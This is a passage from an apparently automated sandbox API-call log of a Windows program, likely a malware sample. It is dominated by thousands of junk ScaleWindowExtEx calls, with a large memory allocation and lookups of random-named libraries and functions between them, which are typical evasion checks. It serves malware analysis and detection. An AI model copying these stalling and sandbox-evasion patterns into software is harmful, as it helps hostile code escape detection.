lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.605] VirtualAlloc (lpAddress=0x0, dwSize=0x21930000, flAllocationType=0x2000, flProtect=0x1) returned 0x2480000 [0147.625] VirtualAlloc (lpAddress=0x2480000, dwSize=0x2192c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2480000 [0153.107] VirtualFree (lpAddress=0x2480000, dwSize=0x2192c000, dwFreeType=0x4000) returned 1 [0156.042] VirtualFree (lpAddress=0x2480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.368] LoadLibraryA (lpLibFileName="C3taUqjCU7eqAyIdAPzjF1nHWemMrup9L3lp460T2.dll") returned 0x0 [0157.372] GetModuleHandleA (lpModuleName="mzfjTcKYjWs7xdfL71cu9tmd9Cw") returned 0x0 [0157.372] GetProcAddress (hModule=0x0, lpProcName="AZMOMSaCRwayip0wWNKiES7U") returned 0x0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] GetModuleHandleA (lpModuleName="user32") returned 0x77820000 [0157.372] GetProcAddress (hModule=0x77820000, lpProcName="GetCursorPos") returned 0x77841218 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.372] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.373] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.374] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.375] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, 